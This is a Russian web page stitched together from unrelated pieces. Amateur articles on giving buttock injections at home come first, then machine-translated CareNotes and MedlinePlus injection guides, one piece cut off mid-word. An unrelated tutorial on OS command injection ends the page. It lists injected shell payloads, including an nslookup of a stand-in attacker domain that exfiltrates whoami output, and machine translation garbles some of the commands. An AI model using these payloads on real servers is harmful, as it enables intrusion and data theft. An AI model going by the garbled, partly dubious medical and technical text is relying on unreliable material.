Куда колоть укол в ягодицу

Хотя бы раз за жизнь каждому человеку приходится лечиться при помощи внутримышечных уколов. Делают инъекции в ягодицу или ногу. Лучше если уколы будет ставить специалист. Но не у всех больных есть возможность посещать процедурный кабинет. Вызвать частную медсестру затратно. Можно научится делать уколы в ягодицу самостоятельно. Знания куда правильно ставится инъекция, пригодятся при лечении детей и взрослых.

Что нужно знать

Инъекции в мышцу ягодицы самый эффективный способ приема медикамента. Лекарство попадает в мышцу и быстро распределяется по всему организму через кровеносные сосуды. Но важно понимать, что ставить укол можно только в определенную зону ягодицы. По мышце проходят кровеносные сосуды и седалищный нерв, важно не попасть в них.

Сделав неправильно внутримышечную инъекцию, можно получить ряд неприятных последствий. Самые опасные из них абсцесс и защемление седалищного нерва. Больной временно не сможет двигать ногой и мышца воспалится. Поэтому важно делать процедуру правильно и по инструкции.

Перед любой внутримышечной инъекцией ознакомьтесь с правилами:

1. Вся процедура должна проходить в стерильных условиях. Перед тем как колоть укол, нужно обработать руки антисептиком. Поверхность, куда будут складываться ампулы и шприц, покрывается стерильной салфеткой или чистым полотенцем.
2. Для укола понадобятся: вата, спирт, шприц на 2 или 5 кубиков.

Правильно будет для взрослого человека брать 5-и кубовый шприц, так как игла нужна длинная, иначе инъекция будет подкожной, а значит, появляется риск появления шишки и абсцесса. Шприц на 2-а кубика подходит для укола детям до 14 лет.

3. Делать инъекции лучше импортным шприцам, с прорезиненным поршнем. С его помощью препарат вводится медленнее и побочных эффектов будет меньше.
4. Ставить внутримышечные уколы лучше человеку в лежачем состояние. Так мышца ягодицы будет расслаблена и поставить укол будет проще.

Как сделать внутримышечную инъекцию

Делать внутримышечную инъекцию нужно в верхнюю наружную 1/4 часть ягодицы. В какую сторону мягкого места, не имеет значения, если инъекция первая. Для более подробного представления, область можно рассмотреть на рисунке — схеме ниже. Условно разделите ягодицы на 4 равных части, в верхнюю будет ставиться инъекция.

Поставить укол можно следующими этапами:

1. Откройте упаковку со шприцом и положите его на стерильную салфетку.
2. Вскройте ампулу с препаратом. Правильно это делать при помощи специального ножика. Большинство современных препаратов продают в ампулах с намеченным местом надлома. Кончик ампулы поворачивают ватой или салфеткой и отламывают. Не стоит ломать ампулу голыми руками, можно перестараться и стекло лопнет, повредив руку.
3. Проверьте концентрацию препарата. Если прописанные препараты в пузырьке в виде сухого порошка, то их необходимо развести физраствором или новокаином.

Каким составом разводить правильно, подскажет врач. Для прокола резиновой крышки пузырька, правильно будет использовать отдельную иголку.

4. Откройте защитный колпачок и наберите медикамент в шприц. Постарайтесь, не задевать стеклянные стенки, так как это затупит иглу и ставить укол будет больно. Набирать препарат нужно в чуть большем количестве, чем необходимо.
5. Переверните шприц иголкой вверх и постучите по нему пальцами. В препарате не должен остаться воздух. Выдавите часть препарата, так в игле не будет воздуха.
6. Продезинфицируйте место, куда будете ставить укол, спиртом и резким движением воткните иглу на 2/3 внутрь. Нельзя колоть укол хлопком, так воздух попадет в иглу.
7. Плавно надавить на поршень и введите медикамент. В шприце должно остаться немного лекарства, меньше 0, 1 мл. Это даст большей уверенности, что воздух не попал внутрь мышцы.
8. Вытащите иголку и приложите к месту укола вату ср спиртом. Ватку стоит подержать 1 минуту. Место инъекции слегка помассировать. Это ускорит рассасывание препарата.

Так как уколы назначаются неединичной инъекцией, то вводить препарат нужно каждый день в разные ягодицы. Если укол ставится самому себе, то проще делать его в мышцу ноги. Процедура болезненная, поэтому стоит изловчиться и воткнуть шприц в ягодицу. А как, и куда колоть, вопросов у читателя возникнуть не должно.

Republished by Blog Post Promoter

Как правильно делать укол в ягодицу или внутремышечный

Как сделать укол в ягодицу, не считают нужным знать многие. Внутримышечные уколы назначают для лечения болезней, но, как безопасно ввести лекарство в мышцу, мало кто доходчиво объясняет. Способ имеет плюсы, помогающие  ускорить процесс восстановления.

---

Используй поиск Мучает какая-то проблема? Введите в форму «Симптом» или «Название болезни» нажмите Enter и вы узнаете все лечении данной проблемы или болезни.

---

   ↑

Делаем укол

Изначально покажется, что это легко.

Стоит продолжительное время учиться, чтобы правильно ввести препарат в мышцу ягодицы.

Одна ошибка нанесёт вред пациенту, которого собираются вылечить.

Чтобы после впрыскивания инъекции не возникло побочных эффектов, процесс проходит по стандартным правилам.

Последовательность действий:

1. Пациент располагается лежа на животе. В таком состоянии мышцы расслаблены.
2. Перед процедурой руки нужно тщательно вымыть антибактериальным мылом. Кожу стоит обработать антисептическим средством. Возможность занести инфекцию будет минимальной.
3. Тот, кто собирается ввести лекарственный препарат, должен обезопасится перчатками, чтобы кровь больного не попала на его кожу.
4. Собственно сам укол делают быстрым движением пустотелой иглы в верхний угол ягодицы. Профессионалы советуют зрительно разделить ее на 4 квадранта и выбрать верхний наружный. Еще одно указание – отступать от линии костей таза, которые выступают, на 5-восемь сантиметров вниз и в это место ставить укол.
5. Вливать лекарство стоит не торопясь, а иглу вынимать одним движением, одновременно прикладывая к месту проспиртованную вату.

Способ для впрыскивания в мышцу является верным. Те люди, которые часто занимаются этой манипуляцией, могут вводить лекарство больному и в положении стоя.

Стоит перенести вес с одной конечности на другую и попытаться расслабить ягодицу. Укол делают по типовой инструкции.

Соблюдение этой последовательности гарантирует, что позже у больного не появятся осложнения.

   ↑

Область манипуляции

Тот, кто впервые парентерально впрыскивает лекарство, должен узнать, что процедура производится в одну верную зону. Из-за отсутствия опыта можно нанести сильную травму человеку и введением лекарства спровоцировать много осложнений.

С целью поиска места для парентерального впрыскивания стоит мысленно поделить ягодицу на 4 части. Если трудно представить в уме, то можно изобразить йодом. Категорически нельзя вливать лекарство в нижние части и в верхний внутренний квадрант (он расположен у позвоночника).

Очевидно, что безопасным решением будет верхний квадрант, который расположен снаружи.

Это стоит знать, чтобы не попасть в нервы крестцового сплетения, крупные сосуды, надкостницу.

Препарат вводится в мышечную ткань, а не в жировой слой, и игла не коснётся костей.

   ↑ https://gidpain.ru/ukol/pravilno-delat-yagodicu.html

В ягодицу

Уточняем место для парентерального введения инъекции. Располагаемся на стуле и сгибаем конечность в колене.

Часть бедра, которая находится вверху и расположенная сбоку, свисающая со стула- это зона для впрыскивания.

Последовательность действий:

• Тщательно моем руки с мылом;
• Садимся на стул, сгибаем ногу в колене, находим, где располагается нужная зона для введения препарата;
• Протираем участок проспиртованной ватой;
• Расслабляем ногу;
• Вставляем иглу на 2 трети длины;
• Медленно вводим лекарство;
• Прижимаем ваткой со спиртом место введения и быстрым движением вынимаем иглу;
• Спокойными движениями делаем массаж зоны.

   ↑

Видео

   ↑

Самостоятельно

Бывают ситуации, что инъекции в ягодицы делать необходимо, а помочь с этим некому.

Расстраиваться и паниковать не нужно.

Специалисты дают простые, но действенные советы, как провести такую манипуляцию правильно и безболезненно, не вызывая плохих последствий.

Техника выполнения:

1. Нужно принять удобное положение, перенести весь вес тела на одну ногу и расслабить ягодицу.
2. Чтобы точно определить, куда правильно делать укол, нужно встать перед зеркалом. Ягодица делится на 4 части, можно даже нарисовать с помощью йода линии и выбирается верхняя наружная область.
3. Лекарство в шприц следует набирать аккуратно, проследив за тем, чтобы внутри не осталось никакого воздуха.
4. Перед самой процедурой руки следует помыть, место укола продезинфицировать ваткой со спиритом.
5. Колоть нужно точным, резким движением в указанной области, игла должна войти в правую ягодицу на 3/4, иногда она входит полностью, но в этом нет ничего страшного. На поршень следует надавливать медленно, полностью вводя внутримышечный препарат.
6. Игла извлекается резким движением, а к месту укола нужно приложить ватку со спиртом и можно немного помассировать место укола.

Научиться самостоятельно делать себе укол не сложно, просто нужно выполнять простые и понятные правила, которые не позволят возникнуть осложнениям. Можно потренироваться по фото. Этому можно научиться.

Многие самостоятельно делают себе уколы, почему этого стесняются, никому не понятно.

   ↑

Возможные последствия

Какое осложнение можно ожидать:

1. Инфильтрат или шишка – такое образование может образоваться на месте введения внутримышечной инъекции.Это происходит из-за быстрого ввода лекарства в ягодицу, поэтому такой процесс следует контролировать тщательно. Чтобы предотвратить образование шишек, нельзя постоянно делать уколы только в одну ягодицу.
2. Внимательно отнеситесь к покраснению кожи. Она достаточно болезненная, касания вызывают неприятные ощущения, а температура поднимается, то срочно нужно идти на прием к хирургу. Симптомы сигнализируют о постинъекционном абсцессе.
3. Можно задеть седалищный нерв. На первых секундах после ввода иглы в ягодицу возникает резкая боль, локализующаяся в задней части бедра, то иглу нужно тут же вытащить. Повторить попытку инъекции можно через некоторое время, определяя место укола.

   ↑

Лечение осложнений

Наиболее сложно поддается лечению абсцесс после неправильного укола.

Возможно хирургическое вмешательство.

Пациенту выписывается курс антибиотиков и обезболивающих средств.

Правильное лечение может справиться с проблемой, но после вмешательства, чаще, остаются заметные следы на коже.

Инфильтраты или шишки лечатся намного проще. Нужно прекратить введение лекарства в ягодицу, после пройти курс назначенных физиотерапевтических процедур.

Если состояние не улучшается, пациенту назначается УЗИ, обследование нужно чтобы исключить скопление жидкости внутри ягодицы. Если это уже произошло, то без вмешательства хирургов не обойтись.

Время восстановления после таких осложнений в каждой ситуации будет разным. Некоторым на полное восстановление и заживления будет достаточно всего 1-2 недель. В случае с тяжелыми абсцессами такой срок может существенно увеличиться.

Неприятные последствия будут устранены, если придерживаться всех правил для введения внутримышечных инъекций. И руки, и место укола нужно обрабатывать и обеззараживать. Риск получить неприятное продолжение будет минимальным.

При первых симптомах ухудшения состояния после уколов, образования даже незначительных шишек – обратитесь к врачу.

Внутримышечная инъекция – это сложная процедура. К этой манипуляции подходят только с наличием знаний всех основных правил ее проведения.

Внимательно отношение к здоровью – залог хорошего самочувствия и прекрасного настроения.

   ↑

Инструменты

Понадобится:

1. Мыло. Не антибактериальное.
   Полотенце. Оно должно быть чистым, а лучше – одноразовым.
2. Тарелка. На неё надо будет сложить все инструменты. Дома трудно продезинфицировать поверхность стола, например, поэтому работать надо с тарелки. Её надо вымыть мылом и протереть антисептиком – спиртовой салфеткой или ватой со спиртом или хлоргексидином.
3. Перчатки. Дома часто пренебрегают перчатками, а зря. Поскольку тут ни о какой стерильности речи не идёт, перчатки нужны особенно сильно, чтобы защитить и пациента, и того, кто делает укол, от передачи инфекций.
4. Шприцы. Объём шприца должен соответствовать объёму лекарства. Если лекарство надо разводить, то учтите, что лучше брать шприц больше.
5. Иглы. Они понадобятся, если лекарство надо разводить. Например, если сухой препарат продаётся в ампуле с резиновой крышкой.
6. Антисептик или спиртовые салфетки. Нужен спирт 70%, антисептик на его основе или хлоргексидин. Для дома подойдут одноразовые спиртовые салфетки, которые продаются в любой аптеке.
7. Место для мусора. Куда-то придётся складывать отработанный материал: упаковки, крышки, салфетки. Лучше сразу сбрасывать их в отдельную коробку, корзинку или куда вам удобно, чтобы это всё не попало на тарелку к чистым инструментам.

   ↑

Рекомендации врача

Не разрешается ставить уколы самостоятельно в случаях:

1. Если препарат назначил не врач. Препарат, его дозировка, чем его разводить – это всё устанавливает доктор, и только он.
2. Если больной никогда раньше не принимал этот препарат. Многие лекарства обладают побочными эффектами и могут вызывать нежелательные реакции.
3. Когда человек, которому требуется укол, болен ВИЧ, гепатитом или другими инфекциями, передающимися через кровь, или если неизвестно, есть ли у человека эти инфекции (нет действительной справки).

   ↑

Подготовка участка

Уколы приходится ставить в ягодицу, для этого пациента укладывают на живот, иногда на бок.

Выбранную ягодицу (удобнее ближайшую) пропальпируйте, чтобы убедиться в отсутствие уплотнений или узлов. Мысленно разделив ее крестом на 4 части, выбирайте верхнюю ближайшую к вам часть ягодицы и продезинфицируйте ее дважды.

После введения препарата проспиртованной ваткой прижимаете кожу по месту входа иглы в плоть и быстро, но уверенно вытягиваете шприц. Массируя место инъекции ваткой, оставляете ее там на какое-то время для обеззараживания.

Важно: если придется делать укол ребенку, следует подготовить шприц меньшего, чем для взрослых пациентов объема с более тонкой иглой. До укола, собирая мышцу в складочку, следует захватить кожу немного глубже, вместе с мышцей, тогда укол не будет болеть.

Узнаем как будет правильно делать уколы внутримышечно в ягодицу?

Отечественная медицина хотя и пережила немало реформ, еще не скоро сможет достичь желаемого уровня. Так, в мегаполисах добраться в больницу не проблема. А вот в мелких городах и деревнях — счастье, если есть хотя бы амбулатория, не говоря уже об аптеке. Так что умение оказывать себе наипростейшую медицинскую помощь сегодня является важным. Конечно, такие сложные манипуляции, как установка капельниц или внутривенные инъекции, должны делать только профессионалы. А вот научиться правильно делать уколы в ягодицу сможет абсолютно каждый. Так что давайте засучим рукава и попробуем освоить эту несложную, но очень важную науку.

Инъекция

Данная процедура более известна для нас под названием укол. Она является одним из способов введения в тело человека жидких лекарственных препаратов. Хотя сегодня уже существует технология безыгольной инъекции (которую и уколом-то назвать нельзя), еще долгие годы основным инструментом для осуществления данной манипуляции будет оставаться традиционный одноразовый шприц.

Существует немало видов инъекций. Обычно они классифицируются по месту введения (внутривенная, внутриартериальная, внутрикостная, внутримышечная и т. п.) или глубине погружения иглы (внутрикожная, подкожная). Большинство таких процедур делаются только в больницах опытными медсестрами и врачами.

Среди главных преимуществ инъекции перед другими способами доставки в организм лекарства — ее скорость. Конечно, многое зависит от места введения препарата. Так, укол в вену быстрее подействует, чем внутримышечный (хотя не все лекарства допустимо вводить в тело обоими этими способами одновременно). Однако последний из-за своей простоты является наиболее популярным.

Внутримышечные инъекции

Слыша это название, большинство представляет банальный укол в филейную часть. В действительности такие инъекции делаются не только в большую ягодичную мышцу, но и в другие (дельтов

Как сделать подкожную инъекцию (помощь при выписке)

1. CareNotes
2. Как сделать подкожную инъекцию
3. Медицинская помощь при выписке

Этот материал нельзя использовать в коммерческих целях, в больницах или медицинских учреждениях. Несоблюдение может повлечь за собой судебный иск.

ЧТО НУЖНО ЗНАТЬ:

Подкожная инъекция — это укол, вводимый в жировой слой между кожей и мышцами. Подкожные инъекции используются для введения небольших количеств некоторых видов лекарств.

ИНСТРУКЦИИ ПО РАЗРЯДУ:

Проконсультируйтесь со своим врачом по указанию:

Запишите свои вопросы, чтобы не забывать задавать их во время визитов.

О шприце:

Шприц состоит из 3 частей: иглы, цилиндра и поршня. Игла входит в кожу. На бочонке находится лекарство, и на нем есть отметки в виде линейки. Обозначения указаны для миллилитров (мл). Поршень используется для ввода и вывода лекарства из шприца.

• Инсулиновый шприц: Вмещает максимум 1 мл лекарства. На шприце нанесена маркировка от 10 до 100. Маркировка 100 соответствует 1 мл. Маркировка 50 соответствует ½ мл.
• Туберкулиновый шприц: В этот шприц помещается до 1 мл лекарства. У него есть игла, которая немного длиннее инсулинового шприца. Шприц маркируется каждые 0,1 мл.

Куда сделать подкожную инъекцию:

Следующие места могут быть введены подкожно:

• Живот: Откройте живот.Вы можете сделать инъекцию в следующую область: ниже талии и чуть выше бедренной кости и сбоку примерно на 2 дюйма от пупка. Избегайте пупка.
• Бедро: Откройте всю ногу. Найдите область посередине между коленом и бедром и немного сбоку. Осторожно возьмитесь за это место, чтобы убедиться, что вы можете ущипнуть кожу на 1–2 дюйма.
• Нижняя часть спины: Раскройте спину от талии до верхней части ягодиц.Представьте себе линию, которая проходит через спину прямо над трещиной между ягодицами. Укол можно делать ниже талии и выше этой линии. Сделайте инъекцию на полпути между позвоночником и боком.
• Верхняя рука: Раскройте руку до плеча. Положите руку на бедро человеку, которому делают инъекцию. Встаньте рядом с человеком и немного позади него. Найдите область посередине между локтем и плечом. Осторожно возьмитесь за кожу на тыльной стороне руки большим и двумя первыми пальцами.Вы должны уметь ухватиться за от 1 до 2 дюймов кожи.

Место для подкожной инъекции:

• Следите за тем, где делаются инъекции: Составьте список сайтов, которые вы используете. Записывайте дату, время и место каждого укола.
• Смените места для инъекций: Важно каждый раз использовать другое место для инъекции. Это предотвращает рубцы и изменения кожи. Места, где делаются инъекции, должны находиться на расстоянии не менее 1 дюйма друг от друга.Спросите, нужно ли вам вводить лекарство в определенное место.

Предметы, необходимые для подкожной инъекции:

• Одна спиртовая салфетка
• Стерильные марлевые салфетки 2 x 2
• Новая игла и шприц подходящего размера
• Перчатки одноразовые, при наличии

Как сделать подкожную инъекцию:

Подкожные инъекции можно вводить прямо под углом 90 градусов или под углом 45 градусов. Сделайте инъекцию под углом 90 градусов, если вы можете захватить 2 дюйма кожи между большим и указательным пальцами.Если вы можете захватить только 1 дюйм кожи, сделайте инъекцию под углом 45 градусов. Мойте ваши руки с мылом и водой. Вы можете надеть перчатки.

• Откройте спиртовую салфетку: Протрите место, где вы планируете сделать инъекцию. Дайте области высохнуть. Не касайтесь этой области, пока не сделаете инъекцию.
• Снимите крышку с иглы: Удерживая шприц пишущей рукой, снимите крышку другой рукой. Поместите шприц между большим и указательным пальцами.Держите цилиндр шприца на втором пальце.
• Возьмите кожу: Другой рукой возьмитесь за кожу.
• Вставьте иглу в кожу: Крепко возьмитесь за цилиндр шприца и запястьем введите иглу в кожу. Как только игла введена полностью, нажмите на поршень, чтобы ввести лекарство.
• Вытяните иглу: Удалите иглу под тем же углом, под которым вы ее вставляете. Осторожно протрите область сухой стерильной марлевой салфеткой 2 x 2.

Как избавиться от использованных шприцев и игл:

Важно правильно утилизировать иглы и шприцы. Не выбрасывайте иглы в мусор. Вы можете получить жесткий пластиковый контейнер, сделанный специально для использованных шприцев и игл. Вы также можете использовать бутылку из-под газировки или другую пластиковую бутылку с завинчивающейся крышкой. Убедитесь, что и шприц, и игла легко входят в контейнер и не могут пробиться сквозь стенки. Спросите у своего лечащего врача или фармацевта, каковы ваши государственные или местные требования по избавлению от использованных шприцев и игл.

Обратитесь к своему врачу, если:

• На месте укола есть опухоль, опухоль или синяк, которые не проходят.
• После инъекции появляется лихорадка, чихание или кашель.
• У вас есть вопросы о том, как делать укол.

Немедленно обратитесь за помощью, если:

• После инъекции появляется сыпь или зуд.
• После инъекции появляется одышка.
• Рот, губы или лицо опухают после инъекции.

© Copyright IBM Corporation 2020 Информация предназначена только для использования Конечным пользователем, ее нельзя продавать, распространять или иным образом использовать в коммерческих целях. Все иллюстрации и изображения, включенные в CareNotes®, являются собственностью A.D.A.M., Inc. или IBM Watson Health

, охраняемой авторским правом.

Приведенная выше информация носит исключительно учебный характер. Он не предназначен для использования в качестве медицинского совета по поводу индивидуальных состояний или лечения.Поговорите со своим врачом, медсестрой или фармацевтом перед тем, как следовать любому лечебному режиму, чтобы узнать, безопасно ли оно для вас и эффективно.

Дополнительная информация

Всегда консультируйтесь со своим врачом, чтобы убедиться, что информация, отображаемая на этой странице, применима к вашим личным обстоятельствам.

Заявление об ограничении ответственности в отношении медицинских услуг

В / м (внутримышечная) инъекция: MedlinePlus Medical Encyclopedia

Очень важно, где вы делаете инъекцию. Лекарство должно попасть в мышцы.Вы не хотите задеть нерв или кровеносный сосуд. Так что покажите своему врачу, как вы выберете место для иглы, чтобы убедиться, что вы можете найти безопасное место.

Бедро:

• Бедро — хорошее место, чтобы сделать инъекцию себе или ребенку до 3 лет.
• Посмотрите на бедро и представьте его на 3 равные части.
• Введите инъекцию в середину бедра.

Бедро:

• Бедро — хорошее место для инъекции взрослым и детям старше 7 месяцев.
• Положите человека на бок. Положите пятку руки там, где бедро соединяется с ягодицами. Ваш большой палец должен указывать на пах человека, а пальцы — на голову человека.
• Отведите первый (указательный) палец от других пальцев, образуя букву V. Вы можете почувствовать край кости на кончиках указательного пальца.
• Введите инъекцию в середину буквы V между указательным и средним пальцами.

Плечо:

• Вы можете задействовать мышцу плеча, если чувствуете там мышцу.Если человек очень худой или мышца очень мала, не используйте этот участок.
• Откройте верхний рычаг. Эта мышца образует перевернутый треугольник, который начинается у кости, проходящей через плечо.
• Острие треугольника находится на уровне подмышки.
• Поместите инъекцию в центр треугольника мышцы. Это должно быть на 1-2 дюйма (2,5-5 см) ниже этой кости.

Ягодицы:

• НЕ используйте этот сайт для детей младше 3 лет, потому что здесь пока недостаточно мышц.Тщательно измерьте это место, потому что инъекция, сделанная в неправильном месте, может поразить нерв или кровеносный сосуд.
• Откройте одну ягодицу. Представьте себе линию от низа ягодиц до верха тазовой кости. Представьте себе еще одну линию от вершины трещины ягодицы до стороны бедра. Эти две линии образуют прямоугольник, разделенный на 4 части.
• Введите инъекцию в верхнюю внешнюю часть ягодиц, ниже изогнутой кости.

Что такое внедрение команд ОС и как это предотвратить?

В этом разделе мы объясним, что такое внедрение команд ОС, опишем, как можно обнаруживать и использовать уязвимости, подробно расскажем о некоторых полезных командах и методах для различных операционных систем и подведем итог, как предотвратить внедрение команд ОС.

Что такое внедрение команд ОС?

Внедрение команд ОС (также известное как внедрение оболочки) — это уязвимость веб-безопасности, которая позволяет злоумышленнику выполнять произвольные команды операционной системы (ОС) на сервере, на котором выполняется приложение, и, как правило, полностью скомпрометировать приложение и все его данные. Очень часто злоумышленник может использовать уязвимость внедрения команд ОС для компрометации других частей инфраструктуры хостинга, используя доверительные отношения для перенаправления атаки на другие системы в организации.

Выполнение произвольных команд

Рассмотрим приложение для покупок, которое позволяет пользователю видеть, есть ли товар в наличии в определенном магазине. Доступ к этой информации осуществляется через URL-адрес, например:

https://insecure-website.com/stockStatus?productID=381&storeID=29

Чтобы предоставить информацию о запасах, приложение должно запрашивать различные устаревшие системы.По историческим причинам функциональность реализуется путем вызова команды оболочки с продуктом и сохранения идентификаторов в качестве аргументов:

stockreport.pl 381 29

Эта команда выводит состояние запасов для указанного товара, которое возвращается пользователю.

Поскольку приложение не обеспечивает защиты от внедрения команд ОС, злоумышленник может отправить следующие входные данные для выполнения произвольной команды:

& echo aiwefwlguh &

Если эти входные данные представлены в параметре productID , то приложение выполняет следующую команду:

складской отчет.pl & echo aiwefwlguh & 29

Команда echo просто вызывает отображение предоставленной строки в выводе и является полезным способом проверки некоторых типов внедрения команд ОС. Символ и является разделителем команд оболочки, поэтому на самом деле выполняются три отдельные команды, одна за другой. В результате пользователю возвращается:

Ошибка - productID не был предоставлен
aiwefwlguh
29: команда не найдена

Три строки вывода демонстрируют, что:

• Оригинальный складской отчет .Команда pl была выполнена без ожидаемых аргументов и вернула сообщение об ошибке.
• Введенная команда echo была выполнена, и предоставленная строка была отражена на выходе.
• Исходный аргумент 29 был выполнен как команда, что привело к ошибке.

Размещение дополнительного разделителя команд и после введенной команды обычно полезно, потому что он отделяет введенную команду от всего, что следует за точкой введения.Это снижает вероятность того, что последующие действия предотвратят выполнение введенной команды.

Полезные команды

Когда вы обнаружили уязвимость внедрения команд ОС, обычно полезно выполнить некоторые начальные команды, чтобы получить информацию о скомпрометированной системе. Ниже приводится сводка некоторых команд, полезных на платформах Linux и Windows:

Цель команды	Linux	Windows
Имя текущего пользователя	кто я	кто я
Операционная система	uname -a	вер
Конфигурация сети	ifconfig	ipconfig / все
Сетевые соединения	netstat -an	netstat -an
Запущенные процессы	ps -ef	список заданий

Уязвимости слепого внедрения команд ОС

Многие случаи внедрения команд ОС являются слепыми уязвимостями.Это означает, что приложение не возвращает вывод команды в своем HTTP-ответе. Слепые уязвимости по-прежнему можно эксплуатировать, но требуются другие методы.

Рассмотрим веб-сайт, который позволяет пользователям оставлять отзывы о сайте. Пользователь вводит свой адрес электронной почты и сообщение обратной связи. Затем серверное приложение генерирует электронное письмо администратору сайта с обратной связью. Для этого он обращается к программе mail с предоставленными деталями.Например:

mail -s "Этот сайт отличный" -aОт: [email protected] [email protected]

Выходные данные команды mail (если есть) не возвращаются в ответах приложения, поэтому использование полезной нагрузки echo не будет эффективным. В этой ситуации вы можете использовать множество других методов для обнаружения и использования уязвимости.

Обнаружение слепой инъекции команды ОС с использованием временных задержек

Вы можете использовать внедренную команду, которая вызовет временную задержку, позволяющую подтвердить, что команда была выполнена, в зависимости от времени, которое требуется приложению для ответа.Команда ping — эффективный способ сделать это, поскольку она позволяет указать количество пакетов ICMP для отправки и, следовательно, время, необходимое для выполнения команды:

& ping -c 10 127.0.0.1 &

Эта команда заставит приложение пинговать свой сетевой адаптер с обратной связью в течение 10 секунд.

Использование слепого внедрения команд ОС путем перенаправления вывода

Вы можете перенаправить вывод внедренной команды в файл в корневом веб-каталоге, который затем можно будет получить с помощью своего браузера.Например, если приложение обслуживает статические ресурсы из расположения файловой системы / var / www / static , вы можете отправить следующие входные данные:

& whoami> /var/www/static/whoami.txt &

Символ > отправляет вывод команды whoami в указанный файл. Затем вы можете использовать свой браузер для получения https://vulnerable-website.com/whoami.txt , чтобы получить файл и просмотреть вывод введенной команды.

Использование слепой инъекции команд ОС с использованием внеполосных (OAST) методов

Вы можете использовать внедренную команду, которая запустит внешнее сетевое взаимодействие с системой, которую вы контролируете, с использованием методов OAST. Например:

& nslookup kgji2ohoyw.web-attacker.com &

Эта полезная нагрузка использует команду nslookup , чтобы вызвать поиск DNS для указанного домена.Злоумышленник может отслеживать выполнение указанного поиска и, таким образом, обнаруживать, что команда была успешно введена.

Внеполосный канал также обеспечивает простой способ эксфильтрации вывода введенных команд:

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

Это вызовет DNS-поиск домена злоумышленника, содержащий результат команды whoami :

wwwuser.kgji2ohoyw.web-attacker.com

Способы внедрения команд ОС

Для выполнения атак путем внедрения команд ОС могут использоваться различные метасимволы оболочки.

Ряд символов функционируют как разделители команд, позволяя объединять команды в цепочку. Следующие разделители команд работают как в Windows, так и в Unix-системах:

Следующие разделители команд работают только в системах на базе Unix:

В системах на основе Unix вы также можете использовать обратные кавычки или символ доллара для выполнения встроенной команды в исходной команде:

• ` введенная команда `
• $ ( введенная команда )

Обратите внимание, что разные метасимволы оболочки имеют слегка различающееся поведение, которое может повлиять на то, работают ли они в определенных ситуациях, и позволяют ли они извлекать выходные данные команды внутри канала или полезны только для слепой эксплуатации.

Иногда вводимые вами данные появляются в кавычках в исходной команде. В этой ситуации вам необходимо завершить цитируемый контекст (используя " или ') перед использованием подходящих метасимволов оболочки для ввода новой команды.

Как предотвратить атаки путем внедрения команд ОС

Безусловно, наиболее эффективный способ предотвратить уязвимости, связанные с внедрением команд ОС, — это никогда не вызывать команды ОС из кода уровня приложения.Практически в каждом случае существуют альтернативные способы реализации требуемой функциональности с использованием более безопасных API-интерфейсов платформы.

Если вызов команд ОС с вводом, вводимым пользователем, считается неизбежным, необходимо выполнить строгую проверку ввода. Вот несколько примеров эффективной проверки:

• Проверка по белому списку разрешенных значений.
• Подтверждение того, что введено число.
• Проверка того, что входные данные содержат только буквенно-цифровые символы, никакого другого синтаксиса или пробелов.

Никогда не пытайтесь дезинфицировать ввод путем экранирования метасимволов оболочки. На практике это слишком подвержено ошибкам и уязвимо для обхода квалифицированным злоумышленником.

.

No related posts.